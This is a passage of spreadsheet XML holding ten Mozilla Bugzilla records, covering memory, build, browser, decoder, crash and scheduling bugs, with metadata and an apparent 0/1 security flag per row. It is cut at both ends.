      </c>
      <c r="R2141" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2141" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2141" t="n">
        <v>1</v>
      </c>
      <c r="U2141" t="n">
        <v>0</v>
      </c>
      <c r="V2141" t="n">
        <v>45</v>
      </c>
      <c r="W2141" t="inlineStr">
        <is>
          <t>In FFOS v2.0, any FFOS app will release ION memory if we put it in background. 
Consider a use case when we are playing video and pressing home key for a long time to bring up "cards view" window so that we can kill video app manually on device . 
But during app transition, both video app and homescreen app becomes forground for a moment. This happens randomly and it can be confirmed from b2g-info/logcat logs
Result is that Homesreen app allocates new ION memory for tiler layer and video app does not allow media-server to delete 20MB ION memory. So we are seeing &gt;40MB ION allocationg during app transition. Normally we see only 29MB ION allocation during video playback. This ION spike causes kernel 'kswapd0' to use memory to swapout old process on 256MB device . Result is that kernel Low Memory Killer is killing video app randomly. 
@alive: it seems like we are doing something like this now for above use case :
1) Assign homescreen app to OOM_ADJ=2 to make it forground app immediately after pressing homekey for a long time
2) We are not putting video app in background before making homescreen as foreground process. 
Can we do something like below :
1) Put video app in background and don't put homescreen to foreground when we press home key for long time ('card view' window to kill video app manually).
2) Assign homescreen app to OOM_ADJ=2 only it is visible on device.
@sotaro: Any better idea for allocation/deletion for homescreen tiler ION memory ?</t>
        </is>
      </c>
      <c r="X2141" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" t="n">
        <v>396148</v>
      </c>
      <c r="B2142" t="inlineStr">
        <is>
          <t>2007-09-14 00:50:57 -0700</t>
        </is>
      </c>
      <c r="C2142" t="inlineStr">
        <is>
          <t>Create "staging" Win32 buildbot slave for TRUNK</t>
        </is>
      </c>
      <c r="D2142" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2142" t="n">
        <v>1</v>
      </c>
      <c r="F2142" t="n">
        <v>1</v>
      </c>
      <c r="G2142" t="n">
        <v>5</v>
      </c>
      <c r="H2142" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2142" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2142" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2142" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2142" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2142" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2142" t="inlineStr"/>
      <c r="Q2142" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2142" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2142" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2142" t="n">
        <v>1</v>
      </c>
      <c r="U2142" t="n">
        <v>0</v>
      </c>
      <c r="V2142" t="n">
        <v>2</v>
      </c>
      <c r="W2142" t="inlineStr">
        <is>
          <t>We need a Win32 VM to act as a buildslave for building FF3/1.9 (which currently
also happens to be TRUNK).
This buildbot slave should be setup to connect to staging-build-console.</t>
        </is>
      </c>
      <c r="X2142" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" t="n">
        <v>1446426</v>
      </c>
      <c r="B2143" t="inlineStr">
        <is>
          <t>2018-03-16 08:48:00 -0700</t>
        </is>
      </c>
      <c r="C2143" t="inlineStr">
        <is>
          <t>gBrowser.addTab() with createLazyBrowser does not work</t>
        </is>
      </c>
      <c r="D2143" t="inlineStr">
        <is>
          <t>2019-06-11 20:37:34 -0700</t>
        </is>
      </c>
      <c r="E2143" t="n">
        <v>1</v>
      </c>
      <c r="F2143" t="n">
        <v>1</v>
      </c>
      <c r="G2143" t="n">
        <v>2</v>
      </c>
      <c r="H2143" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2143" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2143" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K2143" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L2143" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2143" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2143" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2143" t="inlineStr"/>
      <c r="Q2143" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2143" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2143" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2143" t="n">
        <v>1</v>
      </c>
      <c r="U2143" t="n">
        <v>1</v>
      </c>
      <c r="V2143" t="n">
        <v>11</v>
      </c>
      <c r="W2143" t="inlineStr">
        <is>
          <t>Run this code in the browser console:
   gBrowser.addTab("http://example.com", {createLazyBrowser: true});
Result: an empty lazy tab is opened
Expected: a "http://example.com" lazy tab is opened
Regression window: https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=e2ea72d6ed2ca90f8ae3206d3f7c177031b6bdd1&amp;tochange=a03617861cb658e7ad7ad3879bf6a22718d8f6e8</t>
        </is>
      </c>
      <c r="X2143" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" t="n">
        <v>634257</v>
      </c>
      <c r="B2144" t="inlineStr">
        <is>
          <t>2011-02-15 06:30:44 -0800</t>
        </is>
      </c>
      <c r="C2144" t="inlineStr">
        <is>
          <t>nsUCS2BEToUnicode fails to adhere to the API contract when given a buffer with one byte</t>
        </is>
      </c>
      <c r="D2144" t="inlineStr">
        <is>
          <t>2013-12-27 14:18:58 -0800</t>
        </is>
      </c>
      <c r="E2144" t="n">
        <v>1</v>
      </c>
      <c r="F2144" t="n">
        <v>1</v>
      </c>
      <c r="G2144" t="n">
        <v>3</v>
      </c>
      <c r="H2144" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2144" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2144" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K2144" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2144" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2144" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2144" t="inlineStr">
        <is>
          <t>[sg:moderate] or high? [hardblocker][has patch]</t>
        </is>
      </c>
      <c r="Q2144" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2144" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2144" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T2144" t="n">
        <v>1</v>
      </c>
      <c r="U2144" t="n">
        <v>0</v>
      </c>
      <c r="V2144" t="n">
        <v>20</v>
      </c>
      <c r="W2144" t="inlineStr">
        <is>
          <t>The nsIUnicodeDecoder documentation says:
"The eventual incomplete final character data will be stored internally in the converter and used when the method is called again for continuing the conversion. This way, the caller will not have to worry about managing incomplete input data by mergeing it with the next buffer."
and
"When partial input, it will be consumed and cached."
Furthermore, the docs say:
"@param aDestLength [IN/OUT] the length of the destination data buffer; after conversion will contain the number of Unicode characters written"
However, if a one-byte buffer is passed to nsUCS2BEToUnicode, it returns NS_ERROR_ILLEGAL_INPUT in violation of the requirement for decoders to cache partial input and, much worse, it fails to set aDestLength to 0.
This looks to the caller as if the entire output buffer was written to but then an error occurred. This means that uninitialized memory shows to content, because in fact 0 code units were written to the output.
The decoder should work even if it were fed one byte at a time and it should always adjust aDestLength to reflect the actual number of bytes written before it returns.
I've seen crashes that have to be somehow related to this, but I don't have an explanation for how the crashes happen.</t>
        </is>
      </c>
      <c r="X2144" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" t="n">
        <v>508057</v>
      </c>
      <c r="B2145" t="inlineStr">
        <is>
          <t>2009-08-03 10:35:40 -0700</t>
        </is>
      </c>
      <c r="C2145" t="inlineStr">
        <is>
          <t>crash [@ imgRequestProxy::OnStopRequest(nsIRequest*, nsISupports*, unsigned int, int) ] Classic Compact theme</t>
        </is>
      </c>
      <c r="D2145" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:26 -0700</t>
        </is>
      </c>
      <c r="E2145" t="n">
        <v>1</v>
      </c>
      <c r="F2145" t="n">
        <v>1</v>
      </c>
      <c r="G2145" t="n">
        <v>3</v>
      </c>
      <c r="H2145" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2145" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2145" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2145" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2145" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2145" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2145" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2145" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2145" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2145" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2145" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T2145" t="n">
        <v>1</v>
      </c>
      <c r="U2145" t="n">
        <v>1</v>
      </c>
      <c r="V2145" t="n">
        <v>25</v>
      </c>
      <c r="W2145" t="inlineStr">
        <is>
          <t>The extension developer reported that his theme is causing crashes in Firefox. BZ asked me to file a bug so this would not get lost. http://forums.mozillazine.org/viewtopic.php?f=18&amp;t=1395115
Install the classic compact theme and Classic Compact Options
https://addons.mozilla.org/en-US/firefox/addons/versions/6969
https://addons.mozilla.org/en-US/firefox/addons/versions/3699
Use the Classic Compact Options to set the "background style" to "flat"
bookmarks &gt; organize bookmarks will often crash Firefox
Crash stats link in the url ~75 crashes a week.</t>
        </is>
      </c>
      <c r="X2145" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" t="n">
        <v>613832</v>
      </c>
      <c r="B2146" t="inlineStr">
        <is>
          <t>2010-11-21 00:21:45 -0800</t>
        </is>
      </c>
      <c r="C2146" t="inlineStr">
        <is>
          <t>Test jobs not being scheduled promptly</t>
        </is>
      </c>
      <c r="D2146" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2146" t="n">
        <v>1</v>
      </c>
      <c r="F2146" t="n">
        <v>1</v>
      </c>
      <c r="G2146" t="n">
        <v>5</v>
      </c>
      <c r="H2146" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2146" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2146" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2146" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2146" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2146" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2146" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2146" t="inlineStr">
        <is>
          <t>[buildbot]</t>
        </is>
      </c>
      <c r="Q2146" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2146" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2146" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2146" t="n">
        <v>1</v>
      </c>
      <c r="U2146" t="n">
        <v>0</v>
      </c>
      <c r="V2146" t="n">
        <v>17</v>
      </c>
      <c r="W2146" t="inlineStr">
        <is>
          <t>We're not scheduling tests quickly (or at all?) for some pushes.
For example rev 0601ba3e9395 on mozilla-central. One of the compiles:
Linux x86-64 mozilla-central leak test build
scheduled: 2010-11-20 16:49:26
started:   2010-11-20 16:49:51
ended:     2010-11-20 18:16:49
result:    green 
The sendchange took place at Sat Nov 20 18:02:25 2010 and succeeded.
Log on pm01 of it being received
2010-11-20 18:02:28-0800 [Broker,2377,10.2.90.74] adding change, who sendchange-unittest, 2 files, rev=0601ba3e939572d2ea0a773ec05c2b4e72af92ae, branch=mozilla-central-linux64-debug-unittest, repository=, comments , category None, project 
There's a change in the DB, changes.changeid=240857 on changes.branch=mozilla-central-linux64-debug-unittest at changes.when_timestamp=1290304948, aka Sat Nov 20 18:02:28 2010 PST. However the debug unit test don't get scheduled until 20:34.
There's a sourcestamp_changes.sourcestampid=682672, and buildset.id=791317 with buildset.submitted_at=1290314071 (aka Sat Nov 20 20:34:31 2010 PST). That's a 2hour 32 minute gap from the sendchange which is unexplained.
When the tests do run they're showing two other changes, for 6f28a60c1c71, baa51e6d4a15, for which the sendchanges are reported as 18:20 and 18:44.
I have restarted pm02:tests-scheduler to try to free up other pushes which missing test jobs but that hasn't helped.</t>
        </is>
      </c>
      <c r="X2146" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" t="n">
        <v>473315</v>
      </c>
      <c r="B2147" t="inlineStr">
        <is>
          <t>2009-01-12 22:36:39 -0800</t>
        </is>
      </c>
      <c r="C2147" t="inlineStr">
        <is>
          <t>Build process to concatenate JavaScript / CSS files for deployment</t>
        </is>
      </c>
      <c r="D2147" t="inlineStr">
        <is>
          <t>2009-04-18 22:50:59 -0700</t>
        </is>
      </c>
      <c r="E2147" t="n">
        <v>1</v>
      </c>
      <c r="F2147" t="n">
        <v>1</v>
      </c>
      <c r="G2147" t="n">
        <v>6</v>
      </c>
      <c r="H2147" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2147" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J2147" t="inlineStr">
        <is>
          <t>Infrastructure</t>
        </is>
      </c>
      <c r="K2147" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2147" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2147" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2147" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2147" t="inlineStr"/>
      <c r="Q2147" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2147" t="inlineStr">
        <is>
          <t>0.1.x</t>
        </is>
      </c>
      <c r="T2147" t="n">
        <v>1</v>
      </c>
      <c r="U2147" t="n">
        <v>0</v>
      </c>
      <c r="V2147" t="n">
        <v>3</v>
      </c>
      <c r="W2147" t="inlineStr">
        <is>
          <t>We currently develop with many many JavaScript files and we need to concat them for deployment.
We can use http://developer.yahoo.com/yui/compressor/ or ShrinkSafe.</t>
        </is>
      </c>
      <c r="X2147" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" t="n">
        <v>190988</v>
      </c>
      <c r="B2148" t="inlineStr">
        <is>
          <t>2003-01-28 11:27:34 -0800</t>
        </is>
      </c>
      <c r="C2148" t="inlineStr">
        <is>
          <t>hang when displaying image attachments</t>
        </is>
      </c>
      <c r="D2148" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:39 -0800</t>
        </is>
      </c>
      <c r="E2148" t="n">
        <v>1</v>
      </c>
      <c r="F2148" t="n">
        <v>1</v>
      </c>
      <c r="G2148" t="n">
        <v>3</v>
      </c>
      <c r="H2148" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2148" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2148" t="inlineStr">
        <is>
          <t>Networking: NNTP</t>
        </is>
      </c>
      <c r="K2148" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2148" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2148" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2148" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2148" t="inlineStr"/>
      <c r="Q2148" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2148" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2148" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T2148" t="n">
        <v>1</v>
      </c>
      <c r="U2148" t="n">
        <v>0</v>
      </c>
      <c r="V2148" t="n">
        <v>17</v>
      </c>
      <c r="W2148" t="inlineStr">
        <is>
          <t>Mozilla hang when displaying image attachments. Small attachments seems
to work, but most images just hangs.
2003011708 is last nightly that works, all after that hangs.
Header seems to load ok (window caption is updated) but then hangs.
Steps to reproduce:
1. start mailnews
2. subscribe to some group with pictures
3. view some images
Actual results:
 Hang
Expected:
  Image viewed
gdb backtrace when hang:
#0  0x420293d5 in sigsuspend () from /lib/i686/libc.so.6
#1  0x4012f609 in __pthread_wait_for_restart_signal () from 
    /lib/i686/libpthread.so.0
#2  0x4012beec in pthread_cond_wait () from /lib/i686/libpthread.so.0
#3  0x400fc3f8 in PR_WaitCondVar (cvar=0x8837320, timeout=4294967295)
    at ../../../../../nsprpub/pr/src/pthreads/ptsynch.c:389
#4  0x400fcbaf in PR_Wait (mon=0x879d118, timeout=4294967295)
    at ../../../../../nsprpub/pr/src/pthreads/ptsynch.c:567
#5  0x40504549 in nsAutoMonitor::Wait (this=0xbfffef50, interval=4294967295)
    at ../../dist/include/xpcom/nsAutoLock.h:278
#6  0x40502670 in nsPipeOutputStream::Wait (this=0x885fb90)
    at ../../../xpcom/io/nsPipe3.cpp:917
#7  0x40502b3f in nsPipeOutputStream::WriteSegments (this=0x885fb90, 
    reader=0x40502c54 &lt;nsReadFromRawBuffer(nsIOutputStream *, void *, char *,
    unsigned int, unsigned int, unsigned int *)&gt;, closure=0x877fe38, count=58, 
    writeCount=0xbfffeffc) at ../../../xpcom/io/nsPipe3.cpp:1029
#8  0x40502ccb in nsPipeOutputStream::Write (this=0x885fb90, 
    from Buf=0x877fe38 
    "M4T1(*ES7J@.B:5ZH`@2Q!U3()?:7]B2H['9]'2AU)D2#HUE64N!]+ZJ*;-[]",
    bufLen=61, writeCount=0xbfffeffc) at ../../../xpcom/io/nsPipe3.cpp:1088
#9  0x4560b6bc in nsNNTPProtocol::DisplayArticle (this=0x87ce728, 
    inputStream=0x89188bc, length=16384)
    at ../../../../mailnews/news/src/nsNNTPProtocol.cpp:2557
#10 0x4560b8e3 in nsNNTPProtocol::ReadArticle (this=0x87ce728, 
    inputStream=0x89188bc, length=16384)
    at ../../../../mailnews/news/src/nsNNTPProtocol.cpp:2599
#11 0x45614ac9 in nsNNTPProtocol::ProcessProtocolState (this=0x87ce728, 
    url=0x88868ac, inputStream=0x89188bc, sourceOffset=41930, length=16384)
    at ../../../../mailnews/news/src/nsNNTPProtocol.cpp:5128
#12 0x431ee723 in nsMsgProtocol::OnDataAvailable (this=0x87ce734, 
    request=0x88be198, ctxt=0x88868a8, inStr=0x89188bc, sourceOffset=41930, 
    count=16384) at ../../../../mailnews/base/util/nsMsgProtocol.cpp:327
#13 0x40895212 in nsInputStreamPump::OnStateTransfer (this=0x88be198)
    at ../../../../netwerk/base/src/nsInputStreamPump.cpp:402
#14 0x40894e33 in nsInputStreamPump::OnInputStreamReady (this=0x88be198, 
    stream=0x89188bc) at ../../../../netwerk/base/src/nsInputStreamPump.cpp:317
#15 0x4050604d in nsInputStreamReadyEvent::EventHandler (plevent=0x8308a08)
    at ../../../xpcom/io/nsStreamUtils.cpp:101
#16 0x4052b9f0 in PL_HandleEvent (self=0x8308a08)
    at ../../../xpcom/threads/plevent.c:663
#17 0x4052b805 in PL_ProcessPendingEvents (self=0x8123cd8)
    at ../../../xpcom/threads/plevent.c:593
#18 0x4052db06 in nsEventQueueImpl::ProcessPendingEvents (this=0x8123c90)
    at ../../../xpcom/threads/nsEventQueue.cpp:387
#19 0x4154cc50 in event_processor_callback (data=0x8123c90, source=6, 
    condition=GDK_INPUT_READ) at ../../../../widget/src/gtk/nsAppShell.cpp:198
#20 0x4154c6e3 in our_gdk_io_invoke (source=0x82ba7b0, condition=G_IO_IN, 
    data=0x82c7988) at ../../../../widget/src/gtk/nsAppShell.cpp:77
#21 0x402b4f9e in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#22 0x402b6773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#23 0x402b6d39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#24 0x402b6eec in g_main_run () from /usr/lib/libglib-1.2.so.0
#25 0x401d22e3 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#26 0x4154d1d9 in nsAppShell::Run (this=0x8188368)
    at ../../../../widget/src/gtk/nsAppShell.cpp:346
#27 0x414fba8d in nsAppShellService::Run (this=0x8180aa8)
    at ../../../../xpfe/appshell/src/nsAppShellService.cpp:479
#28 0x08066819 in main1 (argc=2, argv=0xbffff714, nativeApp=0x8103380)
    at ../../../xpfe/bootstrap/nsAppRunner.cpp:1298
#29 0x080673d7 in main (argc=2, argv=0xbffff714)
    at ../../../xpfe/bootstrap/nsAppRunner.cpp:1668
#30 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6</t>
        </is>
      </c>
      <c r="X2148" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" t="n">
        <v>265728</v>
      </c>
      <c r="B2149" t="inlineStr">
        <is>
          <t>2004-10-23 00:44:10 -0700</t>
        </is>
      </c>
      <c r="C2149" t="inlineStr">
        <is>
          <t>Synthetic middle-click event can paste</t>
        </is>
      </c>
      <c r="D2149" t="inlineStr">
        <is>
          <t>2013-06-09 18:57:45 -0700</t>
        </is>
      </c>
      <c r="E2149" t="n">
        <v>1</v>
      </c>
      <c r="F2149" t="n">
        <v>1</v>
      </c>
      <c r="G2149" t="n">
        <v>3</v>
      </c>
      <c r="H2149" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2149" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2149" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2149" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L2149" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2149" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2149" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2149" t="inlineStr"/>
      <c r="Q2149" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2149" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2149" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2149" t="n">
        <v>1</v>
      </c>
      <c r="U2149" t="n">
        <v>0</v>
      </c>
      <c r="V2149" t="n">
        <v>8</v>
      </c>
      <c r="W2149" t="inlineStr">
        <is>
          <t>Steps to reproduce on Windows:
1. Go to about:config and middlemouse.paste to true.
2. Copy something to the Windows clipboard.
3. Load the testcase.
Result: the contents of your clipboard are pasted once a second.
On Linux, I imagine this would paste the X primary selection rather than the
contents of the clipboard (without any hidden pref changes).</t>
        </is>
      </c>
      <c r="X2149" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" t="n">
        <v>1197059</v>
      </c>
      <c r="B2150" t="inlineStr">
        <is>
          <t>2015-08-20 20:47:56 -0700</t>
        </is>
      </c>
      <c r="C2150" t="inlineStr">
        <is>
          <t>Firefox in Linux is using Jasper which is unmaintained and vulnerable</t>
        </is>
      </c>
      <c r="D2150" t="inlineStr">
        <is>
          <t>2017-10-11 12:58:37 -0700</t>
        </is>
      </c>
      <c r="E2150" t="n">
        <v>1</v>
      </c>
      <c r="F2150" t="n">
        <v>1</v>
      </c>
      <c r="G2150" t="n">
        <v>3</v>
      </c>
      <c r="H2150" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2150" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2150" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2150" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2150" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2150" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2150" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2150" t="inlineStr">
        <is>
          <t>[adv-main43+]</t>
        </is>
      </c>
      <c r="Q2150" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2150" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2150" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2150" t="n">
        <v>1</v>
      </c>
      <c r="U2150" t="n">
        <v>0</v>
      </c>
      <c r="V2150" t="n">
        <v>20</v>
      </c>
      <c r="W2150" t="inlineStr">
        <is>
          <t>Created attachment 8650845
test.jp2.gz
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150629114848
Steps to reproduce:
In order to preview a jpeg image, Firefox is using gdk-pixbuf in Linux. Such library is loading this type of images using jasper (http://www.ece.uvic.ca/~frodo/jasper/). Unfortunately, this library is unmaintained and day after day we *easily* found new vulnerabilities. For instance:
* http://seclists.org/oss-sec/2015/q3/408
* http://seclists.org/oss-sec/2015/q3/366
* http://seclists.org/bugtraq/2015/Jan/101
* http://seclists.org/bugtraq/2014/Dec/133
You can find a list containing older vulnerabilities here:
http://www.cvedetails.com/vulnerability-search.php?f=1&amp;vendor=&amp;product=jasper&amp;cveid=&amp;cweid=&amp;cvssscoremin=&amp;cvssscoremax=&amp;psy=&amp;psm=&amp;pey=&amp;pem=&amp;usy=&amp;usm=&amp;uey=&amp;uem=
More recently,  I started fuzzing regression tests and i found even more issues, some of then affecting directly Firefox like a malformed image which can crash it. 
The attached files is one of the new issues (re)discovered and it will be reported soon (and more is about to come!). To reproduce it:
1. Download this attached compressed image somewhere
2. Uncompress it
3. Try to attach it or open it with Firefox.
Actual results:
Firefox executed buggy code from libjasper, which crashed. A complete stack trace is here:
#0  0x00007fffb9a32ebc in ?? () from /usr/lib/x86_64-linux-gnu/libjasper.so.1
#1  0x00007fffb9a3316e in ?? () from /usr/lib/x86_64-linux-gnu/libjasper.so.1
#2  0x00007fffb9a327fd in jpc_decode () from /usr/lib/x86_64-linux-gnu/libjasper.so.1
#3  0x00007fffb9a20ecd in jas_image_decode () from /usr/lib/x86_64-linux-gnu/libjasper.so.1
#4  0x00007fffb9c6bfad in jasper_image_try_load (error=&lt;optimized out&gt;, context=&lt;optimized out&gt;) at io-jasper.c:100
#5  jasper_image_stop_load (data=0x7fffc98eed80, error=0x7fffffff9bd0) at io-jasper.c:246
#6  0x00007fffedf4f3b8 in gdk_pixbuf_loader_close (loader=0x7fffbedf9c80, error=0x0) at gdk-pixbuf-loader.c:819
#7  0x00007fffedf4d436 in gdk_pixbuf_get_file_info (filename=&lt;optimized out&gt;, width=0x7fffffffac68, height=0x7fffffffac6c) at gdk-pixbuf-io.c:1948
#8  0x00007ffff2652b9b in ?? () from /usr/lib/firefox/libxul.so
#9  0x00007fffef50b3b8 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#10 0x00007fffef51cd3d in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#11 0x00007fffef524a29 in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#12 0x00007fffef525212 in g_signal_emit_by_name () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
